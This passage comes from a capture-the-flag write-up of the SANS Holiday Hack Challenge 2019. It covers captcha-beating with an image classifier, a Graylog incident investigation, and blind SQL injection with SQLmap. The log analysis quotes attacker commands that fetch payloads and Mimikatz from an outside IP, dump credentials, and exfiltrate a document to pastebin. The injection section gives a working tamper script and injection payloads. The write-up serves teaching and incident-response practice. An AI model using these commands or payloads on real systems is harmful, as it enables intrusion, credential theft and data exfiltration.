    slow <b>Inception V3 model architecture</b>. It's recommended that you start with this
    to validate that you have gathered good training data, but if you want to deploy
    on resource-limited platforms, you can try the <code>`--tfhub_module`</code> flag with a
    <b>Mobilenet model</b> <br><br>

    There are different Mobilenet models to choose from, with a variety of file
    size and latency options.
    <ul>
      <li>
        The first number can be '100', '075', '050', or '025' to control the number
        of neurons (activations of hidden layers); the number of weights (and hence
        to some extent the file size and speed) shrinks with the square of that
        fraction.
      </li>
      <li>
        The second number is the input image size. You can choose '224', '192',
        '160', or '128', with smaller sizes giving faster speeds.
      </li>
    </ul>
  </div>
  <p>
    To check the speed difference, I compared the default inception model against 
    mobilenet_v1_025_224 on the example dataset:
  </p>
  <pre>
https://tfhub.dev/google/imagenet/<mark>inception_v3</mark>/feature_vector/3 (default model)        
    TensorFlow Predicted unknown_images/1.png is a Apple with 99.98% Accuracy
    TensorFlow Predicted unknown_images/3.png is a Banana with 100.00% Accuracy
    TensorFlow Predicted unknown_images/4.png is a Banana with 100.00% Accuracy
    TensorFlow Predicted unknown_images/2.png is a Apple with 99.97% Accuracy
    Time taken: <mark>5.6095273</mark>
https://tfhub.dev/google/imagenet/<mark>mobilenet_v1_025_224</mark>/feature_vector/3
    TensorFlow Predicted unknown_images/1.png is a Apple with 99.99% Accuracy
    TensorFlow Predicted unknown_images/2.png is a Apple with 100.00% Accuracy
    TensorFlow Predicted unknown_images/4.png is a Banana with 100.00% Accuracy
    TensorFlow Predicted unknown_images/3.png is a Banana with 99.91% Accuracy
    Time taken: <mark>0.4748209</mark>
  </pre>
  <p>
    In the end, I decided to try the even smaller model <code>mobilenet_v1_050_192</code>. 
    For the training code, no change is required, just an extra flag on 
    the command line: <code>python retrain.py --image_dir ../capteha_images/ --tfhub_module 
      https://tfhub.dev/google/imagenet/mobilenet_v1_050_192/feature_vector/3</code>. 
    The API interface required an adaptation of the input height and width, 
    highlighted in the code above. This managed to beat the capteha in time, 
    and after 102 retries Krampus was a winner!
  </p>
  <pre>
    ...&lt;snip&gt;...
    Submitting lots of entries until we win the contest! Entry #95
    Submitting lots of entries until we win the contest! Entry #96
    Submitting lots of entries until we win the contest! Entry #97
    Submitting lots of entries until we win the contest! Entry #98
    Submitting lots of entries until we win the contest! Entry #99
    Submitting lots of entries until we win the contest! Entry #100
    Submitting lots of entries until we win the contest! Entry #101
    Submitting lots of entries until we win the contest! Entry #102
    {"data":"&lt;h2 id=\"result_header\"&gt; Entries for email address oh_no@dream.on 
    no longer accepted as our systems show <mark>your email was already randomly selected</mark> 
    <mark>as a winner!</mark> Go check your email to get your winning code. Please allow up to 
    3-5 minutes for the email to arrive in your inbox or check your spam 
    filter settings. &lt;br&gt;&lt;br&gt; Congratulations and Happy Holidays!&lt;/h2&gt;","request":true}</pre>
  <div>
    <img src="img/obj_08/success mail.png" height="350px">
    <img src="img/obj_08/steam_tunnels.png" height="350px">
  </div>
    
  <p>
    I believe I have made a new friend, who will no doubt soon rival Santa 
    in girth. AND I can now use the steam tunnels to get around faster!
  </p>
  <p><div class="answer"><b>Answer</b>: 8Ia8LiZEwvyZr2WO</div></p>
  <div class="quote">
    <div class="name">Krampus:</div>
    <div>
      You did it! Thank you so much. I can trust you! <br>

      To help you, I have flashed the firmware in your badge to unlock 
      a useful new feature: magical teleportation through the steam tunnels. <br>

      As for those scraps of paper, I scanned those and put the images on my server.
      I then threw the paper away.
      Unfortunately, I managed to lock out my account on the server.
      Hey! You’ve got some great skills. Would you please hack into my system and retrieve the scans?
      I give you permission to hack into it, solving Objective 9 in your badge.
      And, as long as you're traveling around, be sure to solve any other challenges you happen across.
    </div>
  </div>

  <h2 id="obj09">Objective 9: Retrieve Scraps of Paper from Server</h2>
  <div class="objective">
    Difficulty:4<br>
    Gain access to the data on the 
    <a href="https://studentportal.elfu.org">Student Portal</a> 
    server and retrieve the paper scraps hosted there. What is the name 
    of Santa's cutting-edge sleigh guidance system? 
    <em>
      For hints on achieving this objective, please visit the 
      dorm and talk with Pepper Minstix.
    </em>
  </div>
  <h3 id="obj09_1">I) Help Pepper Minstix</h3>
  <div class="terminal">
    <img src="img/obj_09/incident_1.png" style="width: 400px;">
    <img src="img/obj_09/incident_2.png" style="width: 400px;">
  </div>
  <div class="quote">
    <div class="name">Pepper Minstix:</div>
    <div>
      It's me - Pepper Minstix.
      Normally I'm jollier, but this Graylog has me a bit mystified.<br>
      Have you used Graylog before? It is a log management system based on Elasticsearch, MongoDB, and Scala.
      Some Elf U computers were hacked, and I've been tasked with performing incident response.
      Can you help me fill out the incident response report using our instance of Graylog?<br>
      It's probably helpful if you know a few things about Graylog.
      Event IDs and Sysmon are important too. Have you spent time with those?
      Don't worry - I'm sure you can figure this all out for me!<br>
      Click on the <em>All messages</em> Link to access the Graylog search interface!
      Make sure you are searching <em>in all messages</em>!
      The Elf U Graylog server has an integrated incident response reporting system. 
      Just mouse-over the box in the lower-right corner.<br>
      Login with the username <code>elfustudent</code> and password <code>elfustudent</code>.
    </div>
  </div>
  <div class="hint">
    &xrarr;
    <a href="http://docs.graylog.org/en/3.1/pages/queries.html">Graylog Docs</a>
  </div>
  <div class="hint">
    &xrarr;
    <div>Event IDs and Sysmon: (Events and Sysmon)</div>
  </div>
  <p>
    Graylog is an alternative to Splunk from Objective 6, so it is time for 
    dunnykin diving again. It is based on MongoDB, a non-relational NoSQL 
    database, so that searching has quite different characteristics from 
    cassical relational searches.
  </p>
  <img src="img/obj_09/graylog.png" width="100%">
  <p>
    <b>Question 1:</b><br> 
    Minty CandyCane reported some weird activity on his computer after 
    he clicked on a link in Firefox for a cookie recipe and downloaded a file.<br>
    What is the full-path + filename of the first malicious file downloaded by Minty?
  </p>
  <p>
    My first attempt was to try the obvious and search for <code>cookie recipe</code>,
    which immediately gave me the answer to question 9. Beginner's luck! <br>
    Having no deep knowledge about sysmon and event IDs (the hint was strangely empty),
    I tried my luck with a variety of search terms from what is known, namely
  </p>
  <ul>
    <li>Minty Candycane</li>
    <li>Cookie recipe</li>
    <li>Link in Firefox</li>
  </ul>
  <p>
    The search term <code>minty AND cookie* AND firefox</code> worked nicely and 
    resulted in a single hit: a firefox process downloading an executable file 
    of cookie recipes! Saves on cooking, I suppose ... 
  </p>
  <pre>
<span>File creation time changed</span>
    CreationUtcTime
        2019-11-19T13:23:45.428Z
    EventID
        2
    ProcessId
        2516
    ProcessImage
        C:\Program Files\Mozilla Firefox\firefox.exe
    TargetFilename
        <mark>C:\Users\minty\Downloads\cookie_recipe.exe</mark>
    source
        elfu-res-wks1
    timestamp
        2019-11-19 05:28:33.000 +00:00</pre>
  <div class="answer">
    <b>Answer: C:\Users\minty\Downloads\cookie_recipe.exe</b><br>
    We can find this searching for sysmon file creation event id <b>2</b> with a 
    process named <b>firefox.exe</b> and not junk <b>.temp</b> files. We can use regular 
    expressions to include or exclude patterns:<br>
    <code>TargetFilename:/.+\.pdf/</code> 
  </div>
  <p>
    <div class="note"> A more directed approach:
      <ol>
        <li>Look at the "all messages" stream, and show the messages for all time (not just 
          the default last 5 mins). Browse one event to see what fields exist in the dataset.
        </li>
        <li>
          Request <b>quick values</b> for the log type field. This gives a nice summary of the 
          log sources comprising the dataset.  
        </li>
        <li>
          If we are looking for a malicious file download, start by searching <b>Sysmon type 2</b> 
          events, which are created when a file is modified. Use the magnifying glass next to Sysmon 
          to show all Sysmon events, and examien the first event to get the correct name for Event ID,
          to add to the query string.
        </li>
        <li>
          Tag the TargetFilename field to show that as part of the summary. Reduce the number of entries 
          by insisting that the path contains the term <b>download</b>, because downloaded files are 
          most often placed in the downloads folder. Complete search term:
          <pre>
WindowsLogType:Microsoft\-Windows\-Sysmon\/Operational AND EventID:2 AND TargetFileName:/.*Download.* </pre>
        </li>
        <li>
          Only two events of interest remain: <b>C:\Users\Minty\Downloads\cookie_recipe.exe</b> and
          <b>C:\Users\Minty\Downloads\cookie_recipe2.exe</b>. The latter was created with PowerShell, 
          the former with Firefox (look for ProcessImage). 
        </li>
      </ol>
    </div>
  </p>

  <p>
    <b>Question 2:</b><br> 
    The malicious file downloaded and executed by Minty gave the attacker 
    remote access to his machine. What was the <b>ip:port</b> the malicious file 
    connected to first?
  </p>
  <p>
    A naive search for the evil executable <code>cookie_recipe.exe</code> gives 23 hits. 
    Choosing the fields DestinationIp and DestinationPort for the results table 
    immediately leads to the event of interest: Network connection detected
  </p>
  <pre>
<span>Network connection detected</span>
    DestinationHostname
        DEFANELF
    DestinationIp
        <mark>192.168.247.175</mark>
    DestinationPort
        <mark>4444</mark>
    EventID
        3
    ProcessId
        5256
    ProcessImage
        C:\Users\minty\Downloads\cookie_recipe.exe
    Protocol
        tcp
    timestamp
        2019-11-19 05:24:04.000 +00:00</pre>
  <div class="answer">
    <b>Answer: 192.168.247.175:4444</b><br>
    We can pivot off the answer to our first question using the binary path 
    as our <b>ProcessImage</b>.
  </div>
  <p>
    <div class="note"> One can restrict the search forther by 
    filtering for Sysmon type 3 events: <b>network communication</b> with only 
    a single result. Note also that port 4444 is often used for Metasploit reverse 
    shells, making it quite suspicious. In fact, the sequence of processes spawned 
    by executing a series of commands found in Question 3 below is typical for 
    a reverse shell. 
  </div></p>

  <p>
    <b>Question 3:</b><br> 
    What was the first command executed by the attacker?<br>
    <em>(answer is a single word)</em>
  </p>
  <p>
    From the previous search, one can see that cookie_recipe.exe starts 
    a sequence of child processes. To investigate what 
    happens next, I searched for events with cookie_recipe.exe as parent 
    process: <code>ParentProcessImage:C\:\\Users\\minty\\Downloads\\cookie_recipe.exe</code>.
    The search term is automatically generated by clicking the + sign to the right
    of the ParentProcessImage field. As one can see, the attack proceeded by using <b>PowerShell</b>  
    to invoke a series of commands:
  </p>
  <table class="bordered">
    <tr><th>timestamp</th><th>command executed</th></tr>
    <tr><td>2019-11-19 05:24:02.000</td><td>&lt;start of execution&gt;</td></tr>
    <tr><td>2019-11-19 05:24:15.000</td><td><mark>whoami</mark></td></tr>
    <tr><td>2019-11-19 05:24:45.000</td><td>ls</td></tr>
    <tr><td>2019-11-19 05:25:40.000</td><td>ls C:\</td></tr>
    <tr><td>2019-11-19 05:25:50.000</td><td>sc query type= service</td></tr>
    <tr><td>2019-11-19 05:26:02.000</td><td>Get-Service</td></tr>
    <tr><td>2019-11-19 05:26:45.000</td><td>cmd /c sc query type= service</td></tr>
    <tr><td>2019-11-19 05:28:25.000</td><td>whoami </td></tr>
    <tr><td>2019-11-19 05:28:32.000</td><td>Invoke-WebRequest -Uri http://192.168.247.175/cookie_recipe2.exe <br>
                                            -OutFile cookie_recipe2.exe</td></tr>
    <tr><td>2019-11-19 05:29:10.000</td><td>ls</td></tr>
    <tr><td>2019-11-19 05:29:20.000</td><td>./cookie_recipe2.exe</td></tr>
    <tr><td>2019-11-19 05:29:27.000</td><td>ls</td></tr>
    <tr><td>2019-11-19 05:31:02.000</td><td>sc start <mark>webexservice</mark> a software-update 1 wmic process <br>
                                            call create "cmd.exe /c C:\Users\minty\Downloads\cookie_recipe2.exe" </td></tr>
    <tr><td>2019-11-19 05:31:55.000</td><td>cmd.exe /c sc start webexservice a software-update 1 wmic process <br>
                                            call create "cmd.exe /c C:\Users\minty\Downloads\cookie_recipe2.exe" </td></tr>
    <tr><td>2019-11-19 05:32:13.000</td><td>ls</td></tr>
    <tr><td>2019-11-19 05:32:43.000</td><td>cmd.exe /c sc start webexservice a software-update 1 C:\Users\minty\Downloads\cookie_recipe2.exe</td></tr>
    <tr><td>2019-11-19 06:09:36.000</td><td>exit </td></tr>
  </table>
  <p></p>
  <div class="answer">
    <b>Answer: whoami</b><br>
    Since all commands (sysmon event id 1) by the attacker are initially running 
    through the <b>cookie_recipe.exe</b> binary, we can set its full-path as our 
    <b>ParentProcessImage</b> to find child processes it creates sorting on timestamp.
  </div>

  <p>
    <b>Question 4:</b><br> 
    What is the one-word service name the attacker used to escalate privileges?
  </p>
  <p>
    Continuing along the list of commands invoked by cookie_recipe.exe, a second 
    executable <b>cookie_recipe2.exe</b> is downloaded and started in the 
    context of <b>webexservice</b>. This is actually the footprint of an exploit 
    for privilege escalation known as 
    <a href="https://blog.skullsecurity.org/2018/technical-rundown-of-webexec">WebExec</a>.
    Curiously enough, this exploit was co-discovered by Jeff McJunkin from CounterHack :-)
  </p>
  <div class="answer">
    <b>Answer: webexservice</b><br>
    Continuing on using the <b>cookie_recipe.exe</b> binary as our <b>ParentProcessImage</b>, 
    we should see some more commands later on related to a service.
  </div>

  <p>
    <b>Question 5:</b><br> 
    What is the file-path + filename of the binary ran by the attacker to dump 
    credentials?
  </p>
  <p>
    Same procedure as before: I looked for events parented by <b>cookie_recipe2.exe</b>.
    This time, only the major commands are listed. After privilege escalation, the 
    <b>Mimikatz</b> toolsuit is downloaded and executed (root privileges are required 
    for that). Mimikatz is a famous and very effective open software tool for extracting 
    credentials from a system. Locally, it is stored as <b>C:\cookie.exe</b> to delay detection.
  </p>
  <table class="bordered">
    <tr><th>timestamp</th><th>command executed</th></tr>
    <tr><td>2019-11-19 05:29:20.000</td><td>&lt;first execution attempt&gt;</td></tr>
    <tr><td>2019-11-19 05:29:24.000</td><td>whoami </td></tr>
    <tr><td>2019-11-19 05:32:43.000</td><td>&lt;second attempt after privilege escalation&gt;</td></tr>
    <tr><td>2019-11-19 05:32:47.000</td><td>whoami</td></tr>
    <tr><td>2019-11-19 05:41:17.000</td><td>Invoke-WebRequest -Uri http://192.168.247.175/mimikatz.exe -OutFile C:\cookie.exe</td></tr>
    <tr><td>2019-11-19 05:41:47.000</td><td>Invoke-WebRequest -Uri http://192.168.247.175/mimilib.dll -OutFile C:\mimilib.dll</td></tr>
    <tr><td>2019-11-19 05:42:08.000</td><td>Invoke-WebRequest -Uri http://192.168.247.175/mimilove.exe -OutFile C:\cookielove.exe</td></tr>
    <tr><td>2019-11-19 05:42:26.000</td><td>Invoke-WebRequest -Uri http://192.168.247.175/mimidrv.sys -OutFile C:\mimidrv.sys</td></tr>
    <tr><td>2019-11-19 05:44:36.000</td><td>C:\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit</td></tr>
    <tr><td>2019-11-19 05:45:14.000</td><td><mark>C:\cookie.exe</mark> "privilege::debug" "sekurlsa::logonpasswords" exit</td></tr>
    <tr><td>2019-11-19 06:09:29.000</td><td>exit</td></tr>
  </table>
  <p></p>
  <div class="answer">
    <b>Answer: C:\cookie.exe</b><br>
    The attacker elevates privileges using the vulnerable <b>webexservice</b> to run 
    a file called <b>cookie_recipe2.exe</b>. Let's use this binary path in our 
    <b>ParentProcessImage</b> search.
  </div>
  <p>
    <div class="note"> In a first attempt, the attacker actually tries to download Mimikatz 
    from its github project page. This fails, for unknown reasons (maybe no direct connection to internet). 
    So, next he successfully downloads from the attacker's own IP address. Finally, Mimikatz is executed to 
    dump the credentials of users who have previously logged in to the workstation. This leads to the 
    following attack of another workstation, using the new-found credentials.
  </div></p>

  <p>
    <b>Question 6:</b><br> 
    The attacker pivoted to another workstation using credentials gained from 
    Minty's computer. Which account name was used to pivot to another machine?
  </p>
  <p>
    A simple-minded search for the IP address <b>192.168.247.175</b> of the attacker
    hits 366 events, too much for comfort. Instead, I peeked ahead and saw from question 7
    that a remote desktop connection was made. According to this
    <a href="https://eventlogxp.com/blog/logon-type-what-does-it-mean/">list of logon types</a>,
    remote desktop means logon type 10. A search for <code>LogonType:10</code> hits 4 events.
    Only one of these lists an AccountName and indicates a successful logon, with 
    <b>Event ID 4624</b>. The other three were unsuccessful (Event Id 4625). This answers 
    both questions 6 and 7.
  </p>
  <p>
    <div class="note"> As there are no other events associated with the 
    cookie_recipe processes, it is unlikely the attacker pivoted elsewhere from this machine. 
    So, the attacker most probably user the previous foothold at 192.168.247.175, where mimikatz
    was downloaded from. Istead of peeking ahead for inspiration at this point, it would have 
    been more honest to search for events with <b>SourceIP 192.168.247.175</b> and show quick values 
    for <b>source</b>. This highlights two targets for traffic from the attacker, wks1 (previous investigation) 
    and wks2. Filtering on that and showing quick values for destination port gives an idea 
    what type of communication was used: port 445 (file sharing) and 3389 (RDP, remote desktop). 
    So, search for windows event ID 4624, which indicates successful logon. Note that the correct 
    LogonType for RDP is 10, not 3. 
    <pre>
source:elfu\-res\-wks2 AND EventID:4624 </pre>
  </div></p>
  <pre>
<span>Successful Logon</span>
    AccountDomain
        NORTHPOLE
    AccountName
        <mark>alabaster</mark>
    AuthenticationPackage
        Negotiate
    DestinationHostname
        elfu-res-wks2
    EventID
        4624
    LogonType
        10
    SourceHostName
        <mark>ELFU-RES-WKS2</mark>
    SourceNetworkAddress
        192.168.247.175
    source
        elfu-res-wks2
    timestamp
        2019-11-19 <mark>06:04:28</mark>.000 +00:00</pre>
  <div class="answer">
    <b>Answer: alabaster</b><br>
    Windows Event Id <b>4624</b> is generated when a user network logon occurs 
    successfully. We can also filter on the attacker's IP using <b>SourceNetworkAddress</b>.
  </div>

  <p>
    <b>Question 7:</b><br> 
    What is the time ( HH:MM:SS ) the attacker makes a Remote Desktop connection 
    to another machine?
  </p>
  <div class="answer">
    <b>Answer: 06:04:28</b><br>
    <b>LogonType 10</b> is used for successful network connections using the RDP client.
  </div>

  <p>
    <b>Question 8:</b><br> 
    The attacker navigates the file system of a third host using their Remote 
    Desktop Connection to the second host. 
    What is the <b>SourceHostName,DestinationHostname,LogonType</b> of this connection?<br>
    <em>(submit in that order as csv)</em>
  </p>
  <p>
    If the attacker uses remote desktop to get into a third system, he will trigger a
    successful logon event (<b>ID 4624</b> as before). The SourceHostName is already known, 
    namely <b>ELFU-RES-WKS2</b> from question 6. A search for 
    <code>SourceHostName:ELFU-RES-WKS2 AND EventID:4624</code> results in 6 hits. 4 of 
    them go to a different host <b>elfu-res-wks3</b>, all with <b>LogonType 3</b> (from the network)
  </p>
  <p>
    <div class="note"> Small error: the connection was not RDP this time. The LogonType 3
    indicates windows filesharing. 
  </div></p>
  <pre>
<span>Successful Logon</span>
    AccountName
        alabaster
    AuthenticationPackage
        NTLM
    DestinationHostname
        <mark>elfu-res-wks3</mark>
    EventID
        4624
    LogonProcess
        NtLmSsp
    LogonType
        <mark>3</mark>
    SourceHostName
        <mark>ELFU-RES-WKS2</mark>
    SourceNetworkAddress
        192.168.247.176
    source
        elfu-res-wks3
    timestamp
        2019-11-19 06:07:22.000 +00:00</pre>
  <div class="answer">
    <b>Answer: ELFU-RES-WKS2,elfu-res-wks3,3</b><br>
    The attacker has GUI access to workstation 2 via RDP. They likely use 
    this GUI connection to access the file system of of workstation 3 using 
    explorer.exe via UNC file paths (which is why we don't see any cmd.exe or 
    powershell.exe process creates). However, we still see the successful 
    network authentication for this with event id <b>4624</b> and logon type <b>3</b>.
  </div>

  <p>
    <b>Question 9:</b><br> 
    What is the full-path + filename of the secret research document after being 
    transferred from the third host to the second host?
  </p>
  <p>
    As admitted in the beginning, I got this straight away through sheer luck by 
    searching for <code>cookie recipe</code>. This returns a single event, 
    representing a powershell command. It does not show how the secret 
    document was transferred from the third host, but instead how it is being 
    spirited away into a <b>pastebin</b>. Its CommandLine:
  </p>
  <pre>
<span>C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe </span>
    Invoke-WebRequest -Uri https://<mark>pastebin.com</mark>/post.php -Method POST -Body @{ 
        "submit_hidden" = "submit_hidden"; 
        "paste_code" = $([Convert]::ToBase64String([IO.File]::ReadAllBytes(
                       "<mark>C:\Users\alabaster\Desktop\super_secret_elfu_research.pdf</mark>"))); 
        "paste_format" = "1"; 
        "paste_expire_date" = "N"; 
        "paste_private" = "0"; 
        "paste_name"="cookie recipe" }</pre>
  <p>
    <div class="note"> The question asks for events at wks2 (<b>after</b> the transfer).
    We are looking for a new file being created, which triggers a <b>Sysmon EventID 2</b> event 
    (filetime modification). These two search filters produce 78 hits. Show TargetFilename and scan 
    through manually to find the desired file.
  </div></p>
  <div class="answer">
    <b>Answer: C:\Users\alabaster\Desktop\super_secret_elfu_research.pdf</b><br>
    We can look for sysmon file creation event id of <b>2</b> with a source of 
    workstation 2. We can also use regex to filter out overly common file 
    paths using something like:<br>
    <code>AND NOT TargetFilename:/.+AppData.+/</code>        
  </div>

  <p>
    <b>Question 10:</b><br> 
    What is the IPv4 address (as found in logs) the secret research document 
    was exfiltrated to?
  </p>
  <p>
    Knowing the secret PDF went to a pastbin, I simply searched for 
    <code>pastebin.com</code>. Two events were found. One of them is the 
    event from question 9, and the other gives a <b>DestinationIp</b> of 104.22.3.84.
  </p>
  <p>
    <div class="note"> To answer this question properly, look for process creation
    events (<b>EventID 1</b>) after the time the file was created on wks2. One finds that powershells 
    Invoke-WebRequest commandlet was used to send the file (base64 encoded) to pastebin.com. The 
    event itself gives no indication of the IP address, but we can pivot off the <b>ProcessId 1232</b> 
    and change Sysmon EventID to 3 (network connection) to find it.
  </div></p>
  <div class="answer">
    <b>Answer: 104.22.3.84</b><br>
    We can look for the original document in <b>CommandLine</b> using regex.<br>
    When we do that, we see a long a long PowerShell command using 
    <b>Invoke-Webrequest</b> to a remote URL of <b>https://pastebin.com/post.php</b>.<br>
    We can pivot off of this information to look for a sysmon network 
    connection id of <b>3</b> with a source of <b>elfu-res-wks2</b> and 
    <b>DestinationHostname</b> of <b>pastebin.com</b>.
  </div>
  <img src="img/obj_09/success.png" width="400px">
  
  
  <div class="quote">
    <div class="name">Pepper Minstix:</div>
    That's it - hooray!
    Have you had any luck retrieving scraps of paper from the Elf U server?
    You might want to look into SQL injection techniques.
    OWASP is always a good resource for web attacks.
    For blind SQLi, I've heard Sqlmap is a great tool.
    In certain circumstances though, you need custom tamper scripts to get things going!
  </div>
  <div class="hint">
    &xrarr;
    <a href="https://www.owasp.org/index.php/SQL_Injection">SQL Injection from OWASP</a>
  </div>
  <div class="hint">
    &xrarr;
    <a href="https://www.sans.org/blog/sqlmap-tamper-scripts-for-the-win/">SQLMap Tamper Scripts</a>
  </div>

  <h3 id="obj09_2">II) Retrieve Scraps of Paper from Server</h3>
  <div class="terminal">
    <img src="img/obj_09/welcome_to_elfu.png">
  </div>
  <p>
    The ELFU student portal at 
    <a href="https://studentportal.elfu.org/">https://studentportal.elfu.org/</a>
    has two forms, one to apply as a student, and another to check application 
    status. Both forms use an intermediate token request to stop automatic tools. 
    This is done by some JavaScript:
  </p>
  <pre class="prettyprint lang-js">
    function submitApplication() {
      console.log("Submitting");
      elfSign();
      document.getElementById("check").submit();
    }
    function elfSign() {
      var s = document.getElementById("token");

      const Http = new XMLHttpRequest();
      const url='/validator.php';
      Http.open("GET", url, false);
      Http.send(null);

      if (Http.status === 200) {
        console.log(Http.responseText);
        s.value = Http.responseText;
      }
    }  </pre>
  <p>
    Before submitting the request, the function elfSign is called which asks 
    for a new token from validator.php. The hidden field "token" is then updated 
    with the return value, which is a (mostly) changing base64 encoded decimal string:
  </p>
  <pre>
MTAwOTM1NDc1OTA0MTU3NzExNjgxMTEwMDkzNTQ3NS45MDQ=_MTI5MTk3NDA5MTU3MTIzMjI5OTM1MjI4LjkyOA==
&rarr; 1009354759041577116811100935475.904_129197409157123229935228.928 </pre>
  <p>
    This can be verified with an intermediate proxy such as ZAP, but tampering 
    with the payload is impossible without some automation because the 
    token times out rather quickly.
  </p>
  <p>
    With a page like this, SQLi on one of the forms is the natural thing to try. 
    The hands-on approach now would be to run the "check application" page from 
    python and try several SQLi options. But SQLmap sounds so much more fun ...
    this is another new tool for me, and a really excellent one at that!  
  </p>
  <p>
    <div class="note"> Just for fun, one could have tried manual SQL 
    injection on the different fields, which produces lovely explicit MariaDB 
    error messages. Using the application form (which uses an INSERT statement), 
    one can set status from pending to accepted (correct word needs to be guessed) 
    by injecting into the essay field.
    The check application page then shows that the application has been processed, 
    but leaves us no closer to Krampus' secrets. A dead end. Also, the attempt 
    to write files (aiming to drop a webshell onto the server) fails: MariaDB syntax 
    for writing files is SELECT INTO DUMPFILE, so we use the Check Application page 
    (which most likely employs SELECT) and insert something like 
    <code>elf@elf.com' INTO DUMPFILE "/temp/test.txt"; --</code>
    after bypassing the restriction to email addresses. However, this only leads to 
    an access denied error showing insufficient privileges to write. Another nicely 
    crafted dead end. We need to find the database structure, which requires blind 
    injection (because there are no useful output fields to show query results).
  </div></p>
  <p>
    SQLmap cannot run "out of the box" because of the request token mechanism 
    described above. This needs to be done by a <b>tamper script</b>, which is 
    used by SQLmap to modify the request before sending it: 
  </p>
  <pre class="prettyprint lang-python">
    #!/usr/bin/env python
    """
    Tamper script for HHC19:
    request token and add to data
    """
    
    import requests
    from lib.core.enums import PRIORITY
    __priority__ = PRIORITY.NORMAL
    
    def dependencies():
        pass
    
    def tamper(payload, **kwargs):
        # remplace spaces in payload, instead or urlencode
        retVal = payload.replace(' ', '%20')
        
        # add token parameter
        token_req = requests.get("https://studentportal.elfu.org/validator.php")
        token = '&token=' + token_req.text
           
        return retVal + token
  </pre>
  <p>
    I decided to try the "check application" form for my SQLi attempt because
    of its simple GET request structure. 
    After adding this script (called <code>hhc19.py</code>) to the tamper folder 
    in the SQLmap directory, running SQLmap seemed to work, but produced no 
    results. It seems that the server is rather specific 
    about its URLs. Trials revealed that spaces have to be URL encoded, 
    whereas other URL encoding is not tolerated. This has to be 
    taken care of in the tamper script, and SQLmap needs to be told not to 
    URLencode with the option <code>--skip-urlencode</code>. The successful
    invocation was
  </p>
  <pre>
python sqlmap.py -u https://studentportal.elfu.org/application-check.php?elfmail=test 
                 --tamper=hhc19 
                 --skip-urlencode
sqlmap identified the following injection point(s) with a total of 273 HTTP(s) requests:
---
Parameter: elfmail (GET)
    Type: <mark>boolean-based blind</mark>
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: elfmail=test' AND 3093=3093 AND 'xkOA'='xkOA

    Type: <mark>error-based</mark>
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: elfmail=test' AND (SELECT 9181 FROM(SELECT COUNT(*),CONCAT(0x71767a6b71,(SELECT (ELT(9181=9181,1))),0x717a627171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Zgcg'='Zgcg

    Type: <mark>time-based blind</mark>
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: elfmail=test' AND (SELECT 3385 FROM (SELECT(SLEEP(5)))rtEa) AND 'Thdf'='Thdf
  </pre>
  <p>
    <b>Blind injection</b> it is! But finding the vulnerability is only the first step. 
    Extracting database structure and contents is incredibly easy with SQLmap, 
    one simply repeats the previous invocation with additional options. The 
    discovery process is not repeated, results are kept in a cache.
  </p>
  <pre>
&lt;basic invocation&gt; <span>--dbs</span>
    available databases [2]:
    [*] elfu
    [*] information_schema

&lt;basic invocation&gt; <span>-D elfu --tables</span>
    Database: elfu
    [3 tables]
    +--------------+
    | applications |
    | <mark>krampus</mark>      |
    | students     |
    +--------------+

&lt;basic invocation&gt; <span>-D elfu -T krampus --columns</span>
    Database: elfu
    Table: krampus
    [2 columns]
    +--------+-------------+
    | Column | Type        |
    +--------+-------------+
    | path   | varchar(30) |
    | id     | int(11)     |
    +--------+-------------+

&lt;basic invocation&gt; <span>-D elfu -T krampus --dump</span>
    Database: elfu
    Table: krampus
    [6 entries]
    +----+-----------------------+
    | id | path                  |
    +----+-----------------------+
    | 1  | <mark>/krampus/0f5f510e.png</mark> |
    | 2  | <mark>/krampus/1cc7e121.png</mark> |
    | 3  | <mark>/krampus/439f15e6.png</mark> |
    | 4  | <mark>/krampus/667d6896.png</mark> |
    | 5  | <mark>/krampus/adb798ca.png</mark> |
    | 6  | <mark>/krampus/ba417715.png</mark> |
    +----+-----------------------+
  </pre>
  <p>
    The six paper scrap images can now be downloaded from studentportal.elfu.org 
    with the paths given by the above table. I used GIMP to load them into 
    different layers, then moved them around to complete the puzzle.
  </p>
  <div class="hangright">
    <img src="img/obj_09/pieces.png" width="250px">
    <img src="img/obj_09/aligned.png" width="250px">
  </div>
  <img src="img/obj_09/letter_final.png" class="centered">
  <p>
    How absolutely evil!!! So Santas brand new sleigh guidance system,
    the <b>Super Sled-o-matic</b>, is to be attacked.
    What a pity that the piece with the name of 
    the author is missing, probably eaten by hungry turtle doves. Strange,
    though, this squiggle on the page almost looks like a tooth ...  

    Maybe Krampus knows what to do about this.
  </p>
  <div class="answer"><b>Answer</b>: Super Sled-o-matic</div>

  <h2 id="obj10">Objective 10: Recover Cleartext Document</h2>
  <div class="objective">
    Difficulty:5<br>
    The <a href="https://downloads.elfu.org/elfscrow.exe">Elfscrow Crypto</a> 
    tool is a vital asset used at Elf University for encrypting 
    SUPER SECRET documents. We can't send you the source, but we do have 
    <a href="https://downloads.elfu.org/elfscrow.pdb">debug symbols</a> 
    that you can use. <br>Recover the plaintext content for this
    <a href="https://downloads.elfu.org/ElfUResearchLabsSuperSledOMaticQuickStartGuideV1.2.pdf.enc">encrypted document</a>.
    We know that it was encrypted on December 6, 2019, between 7pm and 9pm UTC.<br>
    What is the middle line on the cover page? (Hint: it's five words)<br>
    <em>
      For hints on achieving this objective, please visit the 
      NetWars room and talk with Holly Evergreen.
    </em>
  </div>
  <h3 id="obj10_1">I) Help Holly Evergreen</h3>
  <div class="terminal">
    <img src="img/obj_10/holly.png">
  </div>
  <div class="quote">
    <div class="name">Holly Evergreen:</div>
    Hey! It's me, Holly Evergreen! My teacher has been locked out of the quiz 
    database and can't remember the right solution.
    Without access to the answer, none of our quizzes will get graded.
    Can we help get back in to find that solution?<br>
    I tried lsof -i, but that tool doesn't seem to be installed.
    I think there's a tool like ps that'll help too. What are the flags I need?
    Either way, you'll need to know a teensy bit of Mongo once you're in.
    Pretty please find us the solution to the quiz!
  </div>
  <div class="hint">
    &xrarr;
